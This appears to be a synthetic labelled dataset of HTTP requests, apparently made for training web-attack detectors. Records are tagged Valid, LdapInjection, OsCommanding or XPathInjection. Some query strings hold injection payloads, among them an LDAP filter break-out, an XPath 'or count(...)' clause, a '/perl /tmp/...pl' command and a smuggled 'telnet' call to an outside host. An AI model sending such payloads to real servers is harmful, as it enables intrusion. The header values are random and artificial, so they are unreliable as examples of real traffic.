Content-MD5: MmVhU2hCcnRlZnVyb2Vmbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Aug 09 16:21:23 UTC
Last-Modified: Tue, 04 Oct 05 23:04:19 UTC
Host: 230.165.157.10
Connection: keep-alive
Accept: video/*;q=0.7, video/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 79.115.102.49
Cookie: ohesenrvEaohtf=ee3yo
Cookie2: $Version="3"
Date: Wed, 30 Mar 05 22:55:25 UTC
ETag: "hUgP0C3aHVso@DdwX"
Expect: Dbu5i
From: 3ilmmBp@seiiyo.net
If-Modified-Since: Sun, 19 Mar 06 21:42:43 GMT
If-Unmodified-Since: Fri, 12 Feb 10 07:11:23 CET
If-Match: "CpYTvHs_-qTY7QbhI"
If-None-Match: *
If-Range: Sat, 27 Feb 10 02:01:15 GMT
Max-Forwards: 551
MIME-Version: 0.0
Pragma: msiY5sb=r5et
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: Basic cGVhcmUzbjg6dDRzcg==
Range: -7,85-,-56498
Referer: /Bsiln/budwtv/Flbnalu/Crhabesh.cgi
TE: gzip;q=0.5
Trailer: Date
User-Agent: dvWyxV4LN http://www.t6hs.org
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 475x5862
Via: 8.2 www.RrAFfw.shtml, aaodh/7.1 www.duoriem.shtml
Transfer-Encoding: identity
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

16Mj0I=9Traf4hsn@r&e2naceYu1z1s5=selitelnet

End - Id: 6306
Start - Id: 37942
class: LdapInjection
GET /le/oetahelaz/em/eAA7lI/GRl/ib7YDfaD@Iw84DOsG/rTQSlIDJyS1WQbe.tiff?ooHslesytfBnT=ojSw%29%28%26%28objectClass%3Dp35*%29&wdditO4irenb=t1%2FqNs4d%7E&bUDb=+iaeans HTTP/1.1
Host: 196.146.223.11
Connection: tTmi
Accept: text/*;q=0.8, text/html;q=0.9, application/rtf;q=0.7
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 218.10.80.95
Cookie: eriao=e_o_
Cookie2: $Version="513"
Date: Wed, 14 Jan 09 10:28:44 UTC
ETag: W/"JOrl5-.NfFYfjjMCT5uB"
Expect: ws62
From: p2udarel@zentnnsmu.org
If-Modified-Since: Tue, 23 Mar 10 23:55:27 UTC
If-Unmodified-Since: Fri, 11 Dec 09 19:49:34 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: Sun, 26 Jun 05 11:34:38 CET
Max-Forwards: 873
MIME-Version: 3.4
Pragma: 6=dRt
Proxy-Authorization: Digest cnonce="aEoaal"
Authorization: hcdMp olout=settnn
Range: 504-,69-,78804-
Referer: http://www.9wls5tk.it/ettbegri/thamhr/IerasE.sh
TE: deflate;q=0.9
Trailer: Accept-Language
User-Agent: Fto2siosnN
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8848x2681
Via: 6.4 www.rret.png, raOdsh/9.5 www.erUetera.tiff:92, btwede/7.5 222.33.118.83
Transfer-Encoding: chht; ethni=T5pAt
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 730 8.119.149.75:23926 "T2gnENdpnaaoi3hf" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37942
Start - Id: 23204
class: Valid
GET /uedaooancenei/aza_h/5be6bertseitsxhisfre/JZfiOG.UHM6NAW/ge/ukarj2o/sock_stream@.-U@8Ue/sgo8ehoLukmset0ol/it8eOmietumnt/fRhyrD2AZcDPg/iI8iwoxslibe/offsooajW.js?kmx3=feOri HTTP/1.0
Host: 206.223.5.185
Connection: keep-alive
Accept: video/mpeg;q=0.8, application/rtf, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wcxeli3B-cfnxtetu, aigtseZ-wte3;q=0.7, pgq-5o, 2xpcpo03-nmQmDm;q=0.6
Cache-Control: min-fresh=394
Client-ip: 206.15.149.216
Cookie: mo=8au1Aoo6@e d;gdzrdte4=mdtfCtc;0vlikeR4hg89exec3=47
Cookie2: $Version="10"
Date: Thu, 10 Sep 09 21:51:34 GMT
ETag: "YdyrKUwo87rU1DAeu"
Expect: slaFp=dehidse;utow=bdcizeMd
From: yEynS@yostnHon.org
If-Modified-Since: Wed, 01 Dec 04 06:09:42 GMT
If-Unmodified-Since: Sat, 18 Feb 06 11:05:27 UTC
If-Match: "FUiiLv6Yez_l.e_Uyn"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -30,07-2
Referer: /Isei/lupdrnA1/9usuVnfl/sbeadNg.shtml
TE: trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/1.3 (Windows; U; WinNT 8.8; th-vi; rv:4.7.6) Gecko/23750511
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: 5se2b/8.1 www.tmoE.shtml
Transfer-Encoding: gzip
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 740 67.56.178.182:495 "aadiohcwejjhwee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 9726059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23204
Start - Id: 43540
class: OsCommanding
GET /ce2onas/eWkg@vVWoA3/kwindow.openRsystemzE2j3w9/Au9wherejQUZpboI/HXIs@T/o2zSC6Ny71LvpPb6N/iWnDEBTo5l/rJdFFvZuzF/0fDEhyF8PONie/MsTD0ziRx7I/Z@td%u93p1J_/fm.png?nn7ewe9du=tT_WKpvK%40i&Uhnnwted=iooTg&JincludehpaTBkA9Pn=76593&yicrehi=8&msa8aenrie=zAexob1j0object&vu40CAIuNEv=85&afbldn2eitieeos=lec&eptmdae5Z=t8cywwsIf&vr.2G3NW=056557&raaainera0afn=%2Fperl+++%2Ftmp%2Ftoen.pl+++-p5250&eoxnehgaze=13866452&aird1uqlottm=e1zTGn8&ttRopujaaciiis=objectulTmeji2lwindow.openlc&n5el=+htt&Cltu=1scin1ave HTTP/1.0
Host: 240.26.204.136
Connection: cNek3h
Accept: */*
Accept-Charset: iso-2022-jp, iso-8859-6, iso-2022-jp, x-mac-japanese;q=0.4
Accept-Encoding: gzip, deflate, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=71
Client-ip: 214.70.1.175
Cookie: 9cLBgB7cBi=2133077;eGe7=6703552
Cookie2: $Version="046"
Date: Fri, 05 Feb 10 24:16:56 UTC
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: ovr5tcy@thssrmh.de
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Mon, 12 Apr 04 06:57:00 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 9790
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: heioR ugwiagr=aitnk
Range: 387259-2,9-
Referer: http://ndee9i.it/thne/3frirpf/in9ep/eDxTe/selv6.cfm
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/7.0 (Windows; U; WinNT 3.4; tb-ss; rv:7.7.6) Gecko/38656968
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5688x504
Via: HTTP/6.5 187.108.152.187
Transfer-Encoding: identity
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43540
Start - Id: 23453
class: Valid
GET /AJX/tl5e6cwac9tjrr4eonf.exe?5ktern1Oal1er=X&zhpk4at1h8=%7Chosystem&mst7edyrcdn8tct=0538&yse9hfalsls6nlm=-&ITwindow.openhttpv=e HTTP/1.1
Host: www.xmexui.ch
Connection: close
Accept: audio/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.0
Accept-Language: tf7it-ngHueAl6;q=0.3, xscritae-hnii6tl
Cache-Control: only-if-cached
Client-ip: 146.86.154.88
Cookie: ikn=p+a=Ivtoixreplaceruoe;Lincoeaa=~e/<iframeni1aa;f4uLSjH=30153691;be5ttpnsclemufj=aql8itruaWOh;eia6h=779381
Cookie2: $Version="551"
Date: Mon, 02 Oct 06 06:11:15 CET
ETag: W/"-fuUBF2aEQBbYVph"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Sun, 04 Jan 04 21:26:15 CET
If-Unmodified-Since: Sat, 18 Sep 04 08:46:06 CET
If-Match: "g3nHV37mR0@0.3rw4"
If-None-Match: *
If-Range: *
Max-Forwards: 568
MIME-Version: 3.9
Pragma: atnt=s7wta
Proxy-Authorization: Digest username="eru4bt"
Authorization: Digest uri=http://bUdIarge.org/po6eh11.jpg
Range: 60-4,2-51827,267858-0573
Referer: http://6lrZak.it/giKsnz/ydnkom/dsoig.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (X11; U; Linux i386 3.7; eu-A8; rv:3.9.1) Gecko/44079059
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: 5.3 62.245.34.43
Transfer-Encoding: compress
Upgrade: brlae/8.4, ioi/7.9
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23453
Start - Id: 32395
class: Valid
GET /2rZJ/Yopt46C/tcnmIeeiadaneecIh/kj_JrOH3XK/kHfAlmk/updateNCEEqNopenx/VCE/1TsZa2/rieqchoLDaf7EiS/yE7kCXeBi19E5/s@9CkL_Xw2149sZ_IrXF/j6g.html?OAdivTk7z=7&hs6elehet=rNx7M3&6j2T=betweenagaqp%29ir5ks9ru&tii2u=0779622671&ar=h0ZexYE0Pa&cU6qMx=wHajN++neeqEoLi&eteEno0eu=0586&rNuhoa4ld=6&hEEwoEiaihruDo=to&hmajacsunaeep=97226399&e8tosea=nyadToscripte&aRgr=in&M1@h8=otketrluecjcdl HTTP/1.0
Host: 219.26.158.39
Connection: re3suey
Accept: video/mpeg;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: eaptq-miyihn
Cache-Control: no-transform
Client-ip: 174.232.172.74
Cookie: iitYhVcni5ezlIe=xp_t&iix7esra
Cookie2: $Version="701"
Date: Wed, 05 May 04 10:09:28 UTC
ETag: "ybl.IHnOtNqP2AnbpQv3"
Expect: 100-continue
From: itad@eosuny.org
If-Modified-Since: Fri, 30 Apr 10 04:56:34 CET
If-Unmodified-Since: Mon, 19 Sep 05 11:07:22 UTC
If-Match: *
If-None-Match: "fe2mvaZRUedzmTeMF-6"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 13
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bXV5c3NXdG5lc2xtN2Q3aFRlbjlTYXRkZWVvbmFlYkRlaHM0Yzg=
Authorization: yiNgh1 aIorko=absmsuls
Range: 156924-9
Referer: /a8urDe/scer/naielwu/cnmttre/bbts1.jpg
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.4 (compatible; Konqueror/5.3; Win98; rigtwz)
UA-Disp: 281,7423,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 441x524
Via: HTTP/8.6 127.120.31.106, 7.9 www.cge57it0.css:27, 0.6 www.eeolbee.jpg
Transfer-Encoding: identity
Upgrade: ddG/8.0, tra/2.3
Warning: 620 www.jgtesooe.tiff "ezqhi" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 2700091210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32395
Start - Id: 49972
class: XPathInjection
GET /rXQPUWRjZ/0yne/ueSi3t6onekx2tSninbp/6asieOpaa0S/0bonI07ow-Hall/Gbd5dng9egW/nhuwmsrtr9r3Laia/nttn/8fK5B1U.asp?8ibAaaoi=+cs&TtzauoAeete=ysutNe5uo6sattlls&efd3arOh=pTtstfw&kies5een=hIaF2cF5wQ0u&snaUt5sip8flRt=oysock_streamu&uin28j=ef&TFSW.=ws+oscNtQc%25It%27&hesknm0e9=tteLreim%27++++or++6+++++%3C+count%28path%2Fchild%3A%3A*%29++++or++++%27n0yTtTo%27+++%3D++++%27&ewVDB1=flreplaceidt%3Fwrs+sm%3C%28%7Cwy+s+&oc=2897439&eLmciwerizO=+nh&e5ix=33697604 HTTP/1.0
Host: 62.251.170.196
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=3
Client-ip: 6.35.48.2
Date: Thu, 06 Oct 05 08:06:10 CET
ETag: W/"WSy3s1khQ_tRVv5FBi"
Expect: ahthray
From: eovis@cg5u.be
If-Modified-Since: Sat, 27 Aug 05 05:47:42 GMT
If-Unmodified-Since: Sat, 16 May 09 04:40:00 GMT
If-Match: "O-qMEhe5FYWPFs_0Wl"
If-None-Match: "1Nzn24KNu1dwH3r4"
If-Range: Sat, 18 Feb 06 24:25:48 GMT
Max-Forwards: 192
MIME-Version: 0.0
Pragma: pshua9=b
Proxy-Authorization: Digest cnonce="drtr"
Authorization: NTLM bDBvZXQ0YWRoaWxJdGU2b29lY2Fzcm9oc3dwYXRuTXM=
Referer: http://uebicj.biz/MDi2r/tbto.ace
TE: chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: g5lrNs/6.2
UA-OS: Linux
Via: 4.2 www.notea0n.htm
Transfer-Encoding: identity
X-Serial-Number: 91978245471
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49972
Start - Id: 33302
class: Valid
POST /7xUvbscriptq/tEPsfr5zYeuwgc5t/nB/hA2oaAedehsr1lrauxrn/afu/ercfyoi7/iih77iAE-zQ.png? HTTP/1.1
Content-Length: 22
Content-Language: oehrao,8iebb07
Content-Encoding: identity
Content-Location: /eAnw.cgi
Content-MD5: ZnNkb2ViWGhvaXl2TlBJNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Aug 06 03:16:02 UTC
Last-Modified: Wed, 08 Aug 07 02:29:58 GMT
Host: 155.238.169.26
Connection: keep-alive
Accept: image/png;q=0.0, application/postscript;q=0.7
Accept-Charset: windows-1253;q=0.8
Accept-Encoding: *
Accept-Language: g3-i;q=0.5, o05IRt2e-qh;q=0.0, lmHdoyl-noBhlfMo;q=0.5, psmVdtol-gtE
Cache-Control: aod='If1N'
Client-ip: 149.72.197.199
Cookie: hsepd=hIEjtV;e69Jom6= 
Cookie2: $Version="74"
Date: Fri, 08 Sep 06 12:14:18 UTC
ETag: "Xe2rEz2vPptDIu.1ip"
Expect: mkhuhn=8bheVe8;ujr7eg
From: fotmtnu@a26intx.net
If-Modified-Since: Wed, 10 Oct 07 14:52:27 GMT
If-Unmodified-Since: Wed, 04 Jan 06 07:09:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Jan 07 04:04:03 CET
Max-Forwards: 18
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWwycGM4ZXRubm56ZXd0c05sbXl5bGVpbHNuaGxlamFlOHp0amxqZWRSYXhvbg==
Authorization: dhebS3 h92Tnle=xrezp
Range: 8584-634
Referer: http://lsyt.com/9i7e.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 7.9; Tk-nw; rv:9.5.5) Gecko/21444834
UA-CPU: MIPS
UA-Disp: 6993,500,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8624x050
Via: 4.3 0.189.82.133:6
Transfer-Encoding: deflate
Upgrade: dloet/4.5, Feyn5e/9.8, owet/8.5
Warning: 536 www.i6hio.jpeg "noasnsnawtaemRses" 
X-Forwarded-For: 25.177.72.70
X-Serial-Number: 10655264275338066082
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etgcen=tk+&n8iop=log

End - Id: 33302
Start - Id: 55
class: Valid
GET /uT0n/tNiNUreNeBebu9qeh/ufYe.W9dTyPqREDpp/wp-mLF8/jnrsaiAntirslhqeos/fuswLsnieiap/oCK@b9z8hIt5gLoGTx/tShezt0ijapnayqo/ziweeellBt2n/eLWQW6/sNrukdmangl.html?yi=xgstyleoie9gon&Bc_CnlKWqz=0&he6seyvn=542775&5sShe=o7muN%25ui3uS HTTP/1.0
Host: www.cflft9.net
Connection: close
Accept: audio/*
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: 
Accept-Language: rc-er3lr;q=0.1, 1tznw-a;q=0.8, duaijn-mef, outol-cqatban;q=0.5
Cache-Control: max-stale
Client-ip: 58.77.78.27
Cookie: rIcrlg=9977;Nk9ykhoe=92809480;lchoardeFmn=fidz9erssye8n;tbnls2eis=135604;noutalo=245004
Cookie2: $Version="888"
Date: Fri, 18 Sep 09 11:03:09 GMT
ETag: W/"4sU0haqH64aQyDhN0q"
Expect: 100-continue
From: vaeo0rC@NEgga.be
If-Modified-Since: Tue, 16 Dec 08 02:49:56 GMT
If-Unmodified-Since: Thu, 14 Feb 08 24:08:27 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Oct 09 17:34:23 CET
Max-Forwards: 2532
MIME-Version: 5.9
Pragma: cba1ri='cro4S'
Proxy-Authorization: tars n8wyist=srt9i4n
Authorization: NTLM aW5iMG9JdXprZXN0dGFoOXljZ3B5b2Fwc29hMG1LaDY2a0hyZGE4aGpyQW9s
Range: 1364-
Referer: /euhwetK/dtori7/l7M4t5/atuu/tn3hsie.wmn
TE: trailers
Trailer: Date
User-Agent: wcsd9yVztO http://www.hweet.com
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2292x8708
Via: FTP/2.0 www.5eqi.jpeg, 8.8 www.txIl.jpeg
Transfer-Encoding: zlteeg
Upgrade: inasrn/3.3, maEei/1.2, esmue/8.3, rIsao/3.1
Warning: 050 www.dtxiy.tiff "ersra" 
X-Forwarded-For: 99.152.57.134
X-Serial-Number: 23369143968162128737
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 55
Start - Id: 5013
class: Valid
PUT /yB6d/Tossadalhidseenrr/n-N7uFjGRaOaLeu./tYs7g/tAan.sh? HTTP/1.1
Content-Length: 285
Content-Language: enTn,oety,pi
Content-Encoding: gzip
Content-Location: http://www.2doy.uk/n9gee1/duo04/0aa1t/egBrrisZ.js
Content-MD5: c2szZWFNTmxJb2VEMGVtZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 21:15:07 GMT
Last-Modified: Fri, 24 Mar 06 20:33:44 UTC
Host: 223.178.221.78
Connection: nsmq3h9m
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-1;q=0.3, windows-1253, cp-950;q=0.7
Accept-Encoding: compress;q=0.2
Accept-Language: *
Cache-Control: dg='nrTanu'
Client-ip: 123.186.120.10
Cookie: E@l-3ESoIRTM=rprvu9tHaaue
Cookie2: $Version="36"
Date: Tue, 07 Dec 04 18:15:20 UTC
ETag: W/".Soiy4RdXuCwzB4P"
Expect: LpTu=nndgsoa
From: anypee@kdrqiteI.it
If-Modified-Since: Mon, 26 Jul 04 03:34:39 GMT
If-Unmodified-Since: Fri, 31 Jul 09 23:38:06 CET
If-Match: "KI8lkXGiSxOLKwM1KW"
If-None-Match: *
If-Range: "62-WLVzs2qrDDNJc1cbd"
Max-Forwards: 320
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cmRRaXBuZXFTdXVpVG90NDdvU3JpZ3NlbklhNXJlYnVp
Range: -1617,797207-,93795-67
Referer: /4i2uki/riilscan/t6ohrnn/kcam/tZeendo.php
TE: chunked
Trailer: Trailer
User-Agent: nODhIyZ http://www.hhdcoOd.de
UA-CPU: StrongARM
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 3.9 www.dSsi.jpeg:807, 0.4 57.250.88.49, tIu5/7.6 www.mdra.jpg:52
Transfer-Encoding: adCl; coedi=g9eenol
Upgrade: clytr/8.8
Warning: 851 www.tejino.tiff:66659 "iectn" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

larrwontkegE=xterme%29&Kwheregtmpdqfoq=pyn&Rc9ur4ycd6=399394&3_VX7YxM=eeicuntrtslYci&8adfraaoa=nushh&w.unionJf=%273xiiPs%24r5l%2Fl%5Cprocessing-instructionct%3Dzn&nyomepelnvd=567&PBJboot.inie=eopt&7shutdownPu%u=e16DZFoUx_O&e6wpsnjYt2eeesh=k-%3D&net1gewo=T&ulocationxeMP1HphpJNn=f%3E%3E

End - Id: 5013
Start - Id: 22810
class: Valid
GET /g6l3Bk/3ale/aIa.asp?aylcytOotwAPn1=pserE3ST&eRaaicgatoqnx=%25nexectd&rtsk=6430&trn=ow+hhechoh&tashrrr=4&UxdnT=ceervUoyn HTTP/1.1
Host: www.rfm1eTf.be
Connection: close
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.6, euc-tw, x-mac-cyrillic
Accept-Encoding: deflate;q=0.7, identity
Accept-Language: llosoi-yrnci1o;q=0.9, eeht5ddt-x, ceh9-omLrn;q=0.9
Cache-Control: no-cache
Client-ip: 173.3.239.168
Cookie: gmocha9dWUYT7M4I=iritTecse2tqf;eXaewFiia=a3j718qCLf
Cookie2: $Version="219"
Date: Sat, 03 Jan 09 04:24:54 UTC
ETag: W/"-UPx6hoy6goJQp8HT6o"
Expect: 100-continue
From: ixeeaea8@ttdinp.org
If-Modified-Since: Mon, 16 Jan 06 09:31:14 CET
If-Unmodified-Since: Tue, 06 Jun 06 03:52:04 GMT
If-Match: "AvuWd2Vv.jSiLenZu"
If-None-Match: *
If-Range: Fri, 27 Jun 08 07:45:34 CET
Max-Forwards: 13
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: NTLM U3RhZXNjbzlyZWVhYnpyb2FFem9uaGVlaW5lTHJkbTdhbjVtbnRlbG5o
Range: -637
Referer: /9wnefesx/vCeDMe/sttbneo/bgto6/afjttha0.mp3
TE: gzip
Trailer: Transfer-Encoding
User-Agent: renri6te/9.2.2.5.5
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 3.9 189.147.198.234, 1.4 249.5.27.138, 5.1 14.61.169.38
Transfer-Encoding: compress
Upgrade: nlNDj/4.6
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 3049600663
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22810
Start - Id: 36771
class: OsCommanding
GET /DeyenpxtlgIlplhjmm/nIsNv3EcT4iWnRB-0S/etqtf/hh1hcarhsie/huphpoHc24cbgsound/chs2mrs/nodtrstodah/ewuXmIHcc/asHz-l/Sg6D/8su/0@hsHcopyD.asp?da=1915474&kvarFBCJGyni=ogr&execdP@K3echoNc=bRFE4HSS&sn=inbNxtafo8dghe&h4oeodjsxenhe=%5C%22++%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.itlame.com++++22497%5C%3B&QvbscriptYOVTtor=os-%7Codhbt%28c&ie=dol%5DeT%29dnmc&eahtrEcyeNegoh=eMJWdVPaFI&h2aSbhRinr2=451049535&27.8UCE=Exl&Zoolro=0845850&aosijea=%26jginserthoevalj%5D%40position+%40k%2762form&fotTybat7g=052369895&piabhhpwnpim=ca&htaccesnQRUVxuw=325693 HTTP/1.1
Host: www.tbenem.be
Connection: oi29s
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 177.87.216.64
Cookie: Isx=e(
Cookie2: $Version="4"
Date: Thu, 28 Feb 08 07:50:21 CET
ETag: "cVJDZYCIgSRT74iSj-"
Expect: eawot=sec7ek;bqrdn4n
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 21 Dec 08 11:21:07 UTC
If-Unmodified-Since: Fri, 30 Nov 07 05:34:13 CET
If-Match: "saQvoe@JegI55k.cM"
If-None-Match: "d5K1A-MUBJWdku8U"
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Digest response="eAcCed11F3755c174dd9353a700c5b0e"
Range: -0
Referer: /tjit0imn.tar
TE: chunked,chunked
Trailer: If-Range
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 6.3; ud-es; rv:8.3.8) Gecko/32389178
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/8.4 www.hdbaitJq.gif, HTTP/7.9 18.18.230.126:6, HTTP/9.3 85.217.252.111
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36771
Start - Id: 8260
class: Valid
GET /qh/ewBViKoHDk/eyo3uAeeaDoiosRsie/zIeU0La1/reremi7oseHtgfK2erin/eehEL/ez6f47/eesiohgd7/nlie.php3?p-8stylefsD_e=w-tSBrh22&eirt0eb=Emaa5oeaoeh HTTP/1.0
Host: www.pozscec.ch
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: H-atphrub;q=0.4, caemn3jt-elit;q=0.1
Cache-Control: dt9iden='lawt4'
Client-ip: 2.140.51.225
Cookie: pM4zbsexecG_-G=i9;D60-rIWfS=a1uAFPyd.u3;emNsf=tb2zinclude8tp;is7hnE2=hIthg3atT8ne;aadLidas=services;cae=936
Cookie2: $Version="17"
Date: Mon, 04 Aug 08 20:09:11 GMT
ETag: "zpMrKI-Yg3pbzqkpI9"
Expect: 100-continue
From: obst2@srgtiust.it
If-Modified-Since: Tue, 20 Dec 05 12:28:14 GMT
If-Unmodified-Since: Sat, 18 Sep 04 04:22:54 UTC
If-Match: "zj92eQpk7qdjEk38P_g"
If-None-Match: *
If-Range: "Upmz0vTkbk9OzZYjKaXQ"
Max-Forwards: 7
MIME-Version: 1.1
Pragma: t=e5tanysn
Proxy-Authorization: NTLM ZXNlaDRyaHNiMlNpMDV3YnVodGx1SGkzb2dhc3RpZW5FdHJoYmRyb28=
Authorization: sraoNd EIim=sseSg
Range: 245681-56,307766-2495,67-9
Referer: /Dbtird/ldnh4SC/reeCOt.rar
TE: trailers,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 1.6; sw-ex; rv:6.6.0) Gecko/65746388
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 3.6 www.rtbulte.css
Transfer-Encoding: identity
Upgrade: S1pan/7.7, ubun/2.1
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 05009270
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8260
Start - Id: 29757
class: Valid
GET /QBueDuseu/dyU.E/DI.jpeg?o1sdIo1ddp=tP73&fynoLgpiaotet=aoy&DE9@iYFuAsR=eMua&ytot4ac8=as%7C3&iVnalhmnuwDo6=756 HTTP/1.0
Host: 9.211.39.125:482
Connection: close
Accept: image/gif, audio/basic;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: EnrtrTim-haindt, 84Eoeaae-o7;q=0.4
Cache-Control: av=M
Client-ip: 150.197.185.220
Cookie: bi=shWgbsrnhiuH78eDN;ksam1VSqAqN6W=3451719;etnllxks=othLqzuoi
Cookie2: $Version="64"
Date: Sun, 22 Feb 09 14:18:10 UTC
ETag: W/"XKkFV1X.H33kCpiu"
Expect: 100-continue
